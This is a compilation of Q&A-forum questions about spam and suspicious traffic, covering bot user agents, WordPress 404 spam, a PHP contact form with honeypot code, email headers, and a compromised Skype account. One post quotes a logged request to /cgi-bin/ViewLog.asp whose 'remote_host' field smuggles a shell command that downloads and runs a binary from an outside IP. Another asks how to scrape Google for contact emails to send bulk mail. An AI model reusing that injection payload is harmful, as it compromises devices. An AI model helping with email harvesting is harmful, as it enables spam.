Spam from specific user agent

I’ve been getting thousands of requests each day from a specific user agent, Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0. They’re all from different ip addresses (the ones I’ve looked up have been Google LLC and Cloudflare), and they all use that exact same user agent. nginx logs So far I’ve seen 90 unique ip addresses

ip count

I’ve started giving 403 statuses back to them, since it seems like something is wrong here, but I can’t trace them back to any one specific point. They all seem to be legitimate requests, but they’re just so suspicious with the amount of servers they’re coming from. Am I missing something here?

How to stop unknown spam keyword?

I have a weird problem. Kindly let me know should I be worried or not. I installed a redirect plugin in WordPress and saw a 404 error log. Since last night one Korean bet website was in the list like mydomain.com/unknown Korean bet website that resulted in 404 error page. Then I searched it in the string and found it on wp-minify (wp optimizer option) that last night I activated then deleted the wp-minify folder on my WebHost and also deactivate and deleted WPoptimise. After that, I can still see 4,5 links/per minute on 404 error that usually are for spam links (like bet sites, etc..) But nothing on my website. It’s like non existed links to my website with their keywords name. even tho after removing the plugin there is nothing on my WebHost but this link spamming will affect my google score? is there a way I can stop this?

Appreciate any help

wordpress

Scrapping Google “reasonably” without triggering spam filter

My goal is to do some scrapes to get list of businesses per city.

I need to send about 500 emails per day, I use the inurl:contact to make sure that the results have a contact page, and then I extract the email address from that.

So I figure I might batches of about 2000 URL’s not sure yet…

Can I safely crawl 1000-5000 url results a day with the default proxies that come with scrapebox (using the option “harvest proxies”)

spam filter for contact-form.php doesnt work

I am trying in vain to include SPAM protection in the contact form … Can someone help me with this? It’s just getting worse with the spam messages! Google Recaptcha does not work … the checkout field is displayed, but no matter whether it is confirmed or not, the messages go out. Unfortunately, this is also the case with other plugins. In principle, a "simple" // "invisible" query would be enough for me. Most bots should fall for it … But I just don’t get it involved. I uploaded the original_code to github. Below is a file with "invisible" spam protection ….

https://gist.github.com/MrThiemann/3ce76269340acf52c6b5526e5bff0c3e

/* ........................................................... Template Name: Kontaktformular * * * @file           contact-form.php * @filesource     wp-content/themes/handwerk/contact-form.php ............................................................ */ ?>  <?php  $  data = get_option('bo_options'); $  response = isset( $  data['contact']['bo_contact_response'] ) ? $  data['contact']['bo_contact_response'] : null; $  recipient = isset( $  data['contact']['bo_formmail_address'] ) ? $  data['contact']['bo_formmail_address'] : null; $  shdata = isset( $  data['contact']['bo_show_dataprot'] ) ? $  data['contact']['bo_show_dataprot'] : null; $  datalink = isset( $  data['contact']['bo_dataprot_page_url'] ) ? $  data['contact']['bo_dataprot_page_url'] : null; $  bloginfo = get_bloginfo('admin_email'); if ($  recipient == '') { $  rec = $  bloginfo; } else { $  rec = $  recipient; } $  sub = isset( $  data['contact']['bo_formmail_subject'] ) ? $  data['contact']['bo_formmail_subject'] : null; $  offerinfo = isset( $  data['contact']['bo_offer_info_text'] ) ? $  data['contact']['bo_offer_info_text'] : null;  if(isset($  _POST['submitted'])) {     if(trim($  _POST['checking']) !== '') {         $  captchaError = true;     } else {         if(trim($  _POST['contactName']) === '') {             $  nameError = __('Bitte tragen Sie Ihren Namen ein','bobox');             $  hasError = true;         } else {             $  name = trim($  _POST['contactName']);         }         $  phone = trim($  _POST['phone']);             $  subject = trim($  _POST['subject']);             if(isset($  _POST['objectName'])) {                 $  objectname = trim($  _POST['objectName']);             }         if(trim($  _POST['email']) === '')  {             $  emailError = __('Sie haben vergessen, eine E-Mail Adresse einzutragen');             $  hasError = true;         } else if (filter_var(trim($  _POST['email']), FILTER_VALIDATE_EMAIL))  {         $  email = trim($  _POST['email']);          } else {             $  emailError = __('Sie haben eine ungültige E-Mail Adresse eingetragen');             $  hasError = true;         }                  if(trim($  _POST['comments']) === '') {             $  commentError = 'Sie haben vergessen, eine Nachricht einzutragen';             $  hasError = true;         } else {             if(function_exists('stripslashes')) {                 $  comments = stripslashes(trim($  _POST['comments']));             } else {                 $  comments = trim($  _POST['comments']);             }         }         if(!isset($  hasError)) {              $  emailTo = $  rec;             $  msubject = $  sub;             $  body = " \n\nEine Anfrage zum Thema: $  objectname  \nvon:\nName: $  name \nEmail: $  email \nBetrifft: $  subject \nTelefon: $  phone \n\nNachricht: $  comments ";             $  headers = 'From: <'.$  emailTo.'>' . "\r\n" . 'Reply-To: ' . $  email. "\r\n";             $  headers .= "MIME-Version: 1.0\r\n";                 $  headers .= "Content-type: text/plain; charset=utf-8\r\n";                 $  headers .= "Content-Transfer-Encoding: 8bit";                          mail($  emailTo, $  msubject, $  body, $  headers);                           $  emailSent = true;          }     } } ?>   <?php get_header(); ?>                                   <div id="page-entry">                           <?php if(isset($  hasError) || isset($  captchaError)) { ?>         <h1>Sorry, <?php echo $  name;?></h1>             <p class="error">Bei der &Uuml;bermittlung hat es einen Fehler gegeben!<p>         <?php } ?>                                   <?php if(isset($  emailSent) && $  emailSent == true) { ?>      <div class="thanks">         <h2>Vielen Dank, <?php echo $  name;?></h2>         <p><?php echo $  response; ?></p>     </div>  <?php } else { ?>      <?php if (have_posts()) : ?>          <?php while (have_posts()) : the_post(); ?>                            <h1 class="post-title"><?php the_title(); ?></h1>                             <div class="contact-content">                  <?php the_content(); ?>                  <?php include ("google-map-iframe.php"); ?>         </div><!-- eof contact content -->                               <div class="contactform">           <?php if(isset($  _POST["object-title"])) { ?>         <div class="selected-offer">                               <p><?php echo $  offerinfo; ?> <a href="<?php echo $  _POST["object-link"] ?>"><?php echo $  _POST["object-title"] ?></a></p>                          </div>         <?php } ?>                        <form action="<?php the_permalink(); ?>" id="contactForm" method="post">           <div class="formcolumn"> <label for="contactName"><?php echo __('Ihr Name','bobox'); ?>*:</label><input required="required" type="text" name="contactName" id="contactName" value="<?php if(isset($  _POST['contactName'])) echo $  _POST['contactName'];?>" class="requiredField" /><?php if(isset($  nameError)) { if($  nameError != '') { ?><span class="error"><?php echo $  nameError;?></span> <?php } } ?>                            <label for="subject"><?php echo __('Betrifft','bobox'); ?>:</label>   <input type="text" name="subject" id="subject" value="<?php if(isset($  _POST['subject']))  echo $  _POST['subject'];?>" class="email" /> </div>          <div class="formcolumn">                  <label for="email"><?php echo __('Ihre E-Mail Adresse','bobox'); ?>*:</label>             <input required="required" type="text" name="email" id="email" value="<?php if(isset($  _POST['email']))  echo $  _POST['email'];?>" class="requiredField email" />                     <?php  if(isset($  emailError)) { if($  emailError != '') { ?>                         <span class="error"><?php echo $  emailError;?></span>                     <?php } }?>            <label for="phone"><?php echo __('Ihre Telefonnummer','bobox'); ?>:</label>   <input type="text" name="phone" id="phone" value="<?php if(isset($  _POST['phone']))  echo $  _POST['phone'];?>" class="email" />     </div>                 <div class="clear"></div>                                            <label for="commentsText"><?php echo __('Ihre Nachricht','bobox'); ?>*:</label>                     <textarea required name="comments" id="commentsText" rows="10" cols="30" class="requiredField"><?php if(isset($  _POST['comments'])) { if(function_exists('stripslashes')) { echo stripslashes($  _POST['comments']); } else { echo $  _POST['comments']; } } ?></textarea>                     <?php if(isset($  commentError)) { if($  commentError != '') { ?>                         <span class="error"><?php echo $  commentError;?></span>                      <?php } } ?>                                       <?php  if(isset($  shdata) && $  shdata == 'yes') { ?>  <div class="wr clearfix">                     <input required="required" type="checkbox" name="contactData" id="contactData" value="true"<?php if(isset($  _POST['contactData']) && $  _POST['contactData'] == true) echo ' checked="checked"'; ?> /><label class="shortleft agreelabel" for="contactData"><?php  echo sprintf( __( 'Ja, ich habe die <a target="_blank" href="%s">Datenschutzerkl&auml;rung</a> gelesen und bin damit einverstanden, dass meine Daten elektronisch erhoben und gespeichert werden. Meine Daten werden ausschlie&szlig;lich zweckgebunden zur Bearbeitung meiner Anfrage genutzt.', 'bobox' ), $  datalink ); ?>*</label></div><?php } ?>                                                <div class="screenReader" style="left: -9999px; position: absolute; top: -9999px;"><label for="checking" class="screenReader">If you want to submit this form, do not enter anything in this field</label><input type="text" name="checking" id="checking" class="screenReader" value="<?php if(isset($  _POST['checking']))  echo $  _POST['checking'];?>" /></div>                   <input type="hidden" name="objectName" id="objectName" value="<?php if(isset($  _POST["object-title"])) { echo $  _POST["object-title"]; } ?>" class="readonly " />                 <input type="hidden" name="submitted" id="submitted" value="true" />                  <button type="submit"><?php echo __('Nachricht jetzt absenden','bobox'); ?></button>                                                 </form>     </div>            <?php endwhile; ?>     <?php endif; ?> <?php } ?>     <div class="clear"></div> </div>     </div><!-- eof content -->  <?php get_footer(); ?> 

and here is "actually" a simple invisible checkbox.

$  errors = array();  //Prüfen ob Formular abgesendet if(isset($  _POST['submit'])) {          //Spamcheck mit jedem neuem Absenden zurücksetzen     $  spamcheck = false;       //Spamcheck     if(!empty($  _POST["repeat_email"]) || isset($  _POST["terms"])) {         $  errors[] = "Zusatzfelder wurden ausgefüllt, wir vermuten Spam und brechen hier ab.";        } else {         $  spamcheck = true;     }      // Eingaben Validieren     if($  spamcheck = true) {           if(empty($  _POST['name'])) { //Wenn Name leer             $  errors[] = "Bitte geben Sie Ihren Namen an";         }                  if(empty($  _POST['email'])){ //Wenn Email leer             $  errors[] = "Bitte Emailadresse angeben";         } elseif (filter_var($  _POST['email'], FILTER_VALIDATE_EMAIL) == false) { //Emailformat überprüfen ab PHP 5.2             $  errors[] = "Bitte geben Sie ein gültige Emailadresse an";         }                          if(empty($  _POST['message'])){ //Wenn Nachricht leer             $  errors[] = "Bitte geben Sie Ihre Nachricht ein";         }          if(!isset($  _POST["gender"])){ //Wenn Spamcheck nicht markiert             $  errors[] = "Bitte bestätigen Sie den Spamcheck";         }                 }      if(isset($  _POST['submit']) && empty($  errors) && $  spamcheck == true) {         // Spamtest bestanden, alle erforderlichen Felder richtig ausgefüllt         // Eintrag in Datenbank oder Email Versand         echo "Alles richtig gemacht";     }  } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>  <title>Tutorial: PHP Formular Spamschutz und Validierung – Spam Emails verhindern auch ohne Captcha</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />      <script src="http://codeorigin.jquery.com/jquery-1.10.2.min.js"></script> <script type="text/javascript"> $  (document).ready(function(){     $  ('.terms').append('<input type="text" name="repeat_email" value="test" />'); }); </script>  <style>     /*Demo Formular Styles*/     label { display:inline-block; width:100px; }     input { padding:5px; width:300px; }     input[type="checkbox"] { width:20px; margin-right:10px; }     textarea { width:410px; }        .terms { display:none; } </style>    </head>  <body>        <h2>Demo: PHP Formular Spamschutz und Spamabwehr ohne Captcha</h2>     <p><a href="http://sevenx.de/blog/php-formular-spamschutz-und-validierung-spam-emails-verhindern-auch-ohne-captcha">Zum Blogartikel &raquo; sevenX.de</a></p>          <noscript>Bitte aktivieren Sie Javascript zum Absenden des Formulars oder nutzen Sie eine der alternative Kontaktmöglichkeiten unter www.domain.de/kontakt.htm</noscript>        <?php if(isset($  _POST['submit']) && empty($  errors) === false) {?>       <div style="background:#FCC">           <strong>Bitte überprüfen Sie Ihre Angaben!</strong><br />           <?php echo '<ul><li>'.implode('</li><li>',$  errors).'</li></ul>'; ?>       </div>       <?php } ?>                          <form id="phpform" method="post" action="formular-spamschutz.php">              <p><label for="name">Name<span>*</span></label>             <input type="text" name="name" value="<?=(isset($  _POST['name'])) ? $  _POST['name'] :''?>"></p>              <p><label for="email">Email<span>*</span></label>             <input type="text" name="email" value="<?=(isset($  _POST['email'])) ? $  _POST['email'] :''?>"></p>              <p><label for="message">Nachricht<span>*</span></label><br />             <textarea name="message" rows="8"><?=(isset($  _POST['message'])) ? $  _POST['message'] :''?></textarea></p>              <p><input type="checkbox" name="gender" <?=(isset($  _POST['human'])) ? "checked='checked'" : ''?>><span>*</span> Ich versende keinen Spam</p>              <p><input type="submit" name="submit" value="Absenden"></p>              <div class="terms">             Folgende Felder bitte frei lassen!             <input type="checkbox" name="terms">             </div>                   </form>         <p><a href="http://sevenx.de/" target="_blank">Made with love by sevenX.de - Rico Loschke</a></p>  </body> </html> ``` 

Was this spam email routed through Ukraine goverment’s mail servers? [closed]

I have recently received a typical spam email, but seeing it’s from domain gov.ua I have decided to examine it’s headers knowing that From field is not clear indicator of the sender.

To my surprise, the email originating from a mail client in South Africa had been routed through mail.mk.npu.gov.ua before reaching mx.gmail.com, Google’s mail exchange servers.

  1. Am I correct in assessing this?
  2. mk.npu.gov.ua belongs to Ukraine’s national police, so why would spam be routed through servers belonging to Ukrainian police?

Here is the relevant header excerpt:

Received: from mail.mk.npu.gov.ua (mail.mk.npu.gov.ua. [212.1.64.157])         by mx.google.com with ESMTPS id 127si3307596ljf.47.2020.09.03.22.16.27         (version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128);         Thu, 03 Sep 2020 22:16:27 -0700 (PDT) Received-SPF: pass (google.com: domain of ubnon01@mk.npu.gov.ua designates 212.1.64.157 as permitted sender) client-ip=212.1.64.157; Authentication-Results: mx.google.com;        spf=pass (google.com: domain of ubnon01@mk.npu.gov.ua designates 212.1.64.157 as permitted sender) smtp.mailfrom=ubnon01@mk.npu.gov.ua Received: from localhost (localhost [127.0.0.1])     by mail.mk.npu.gov.ua (Postfix) with ESMTP id A584F4EA7B6;     Fri,  4 Sep 2020 05:53:44 +0300 (EEST) Received: from mail.mk.npu.gov.ua ([127.0.0.1])     by localhost (mail.mk.npu.gov.ua [127.0.0.1]) (amavisd-new, port 10032)     with ESMTP id rGonvgTsqLKI; Fri,  4 Sep 2020 05:53:44 +0300 (EEST) Received: from localhost (localhost [127.0.0.1])     by mail.mk.npu.gov.ua (Postfix) with ESMTP id 8015750574B;     Fri,  4 Sep 2020 05:35:58 +0300 (EEST) X-Virus-Scanned: amavisd-new at mk.npu.gov.ua Received: from mail.mk.npu.gov.ua ([127.0.0.1])     by localhost (mail.mk.npu.gov.ua [127.0.0.1]) (amavisd-new, port 10026)     with ESMTP id QwWi9Xuk_Cn7; Fri,  4 Sep 2020 05:35:58 +0300 (EEST) Received: from [172.20.10.2] (unknown [105.12.7.241])     by mail.mk.npu.gov.ua (Postfix) with ESMTPSA id 7106E4EA8D6;     Fri,  4 Sep 2020 05:29:50 +0300 (EEST) 

My question is being marked as spam and I’m blocked on Meta

Today, I tried to post a question on Information Security Stack Exchange, and the question was apparently marked as "spam" (the error message was this looks like spam). The content of the question can be found here: VeraCrypt Paste. I’m thinking it might have been because of the URIs, but I tried to remove them all and it continued to mark the question as spam.

I then went to Infosec Meta Exchange, to try to see if I could get some help, but I’m blocked there. Like, weirdly blocked. All requests I make to the Security Meta domain while logged give me an empty page and a 500 status code. It works fine if I logout. I truly don’t know that to do.

I’m 100% aware this post doesn’t belong here, but I’m apparently out of options – don’t know what else I can do – the help page doesn’t say anything about that -, so please don’t downvote this right away. I’m obviously ok with this question being deleted, I just need some help now.

Spam Mail Related to my Browsing

I was searching google to find a good printer to buy. To my horror, the next day I got a spam mail with theme "Print smarter at low price". Is this a coincidence or is my PC breached? What should I do? No alerts from Anti-Virus. Or can that webpage I opened install some malware? I didn’t click on anything there.

Spam issue regarding security on gmail app

I have been getting a ton of spam email, so I looked at one of them. I did not click anything, or download anything. However there was a spammy image with option to click on (as they always do).

Would this infect my device or the app (gmail app)? I am using an android phone. All I did was look at a spam email.

As checks, I ran the play protect from the play store. In addition, I have run several malware detection apps: Malwarebytes,Bitdefender etc. I have also looked at the installed apps and used safe mode just in case. Nothing has turned up, all of these steps show no infections.

My questions: a) is there any other check I should do? b) does just looking at an email cause an infection on the gmail app on android?

Constant POST request spam to /cgi-bin/ViewLog.asp endpoint

I’ve got a DigitalOcean server that I use for different temporary servers. Lately I’ve found that sometimes I get a constant spam of the following requests:

POST http://127.0.0.1/cgi-bin/ViewLog.asp  Headers:     Host: 127.0.0.1     Connection: keep-alive     Accept-Encoding": gzip, deflate     Accept: */*     User-Agent: B4ckdoor-owned-you     Content-Length: 176     Content-Type: application/x-www-form-urlencoded  Body: {     " remote_submit_Flag": "1", // Space is not a typo     "remote_syslog_Flag": "1",     "RemoteSyslogSupported": "1",     "LogFlag": "0",     "remote_host": ";cd /tmp;wget http://152.44.44.68/d/xd.arm7;chmod 777 xd.arm7;./xd.arm7;rm -rf xd.arm" } 

Which does not really bother me since I run Node.js servers only. What bothers me is the repetition of the attack and the Host header (although I believe this one can be faked).

I’ve used to run a DNS server that defaulted to Google DNS, that I left unattended for some time and it gathered 1.5TB of traffic in one month. The named -v shows version 9.11.3-1ubuntu1.12-Ubuntu.

Is the server compomised?

My old Skype is sending Baidu spam

My old skype account that I haven’t used in over 4 years is sending my friends Baidu spam links. I tried logging in but couldn’t remember the password. I checked my old email on haveibeenpwned, and found out it was in a data breach from 2017 for Yu-Gi-Oh Dueling Network. Is this Yu-Gi-Oh data breach still available online? Because I can’t remember my old email password either. I don’t know if that’s how the hacker accessed my Skype but I can’t think of another way. PS; that email was my main e-mail from ages 12-19, so I’m worried about this leak. I really don’t know what to do… Thanks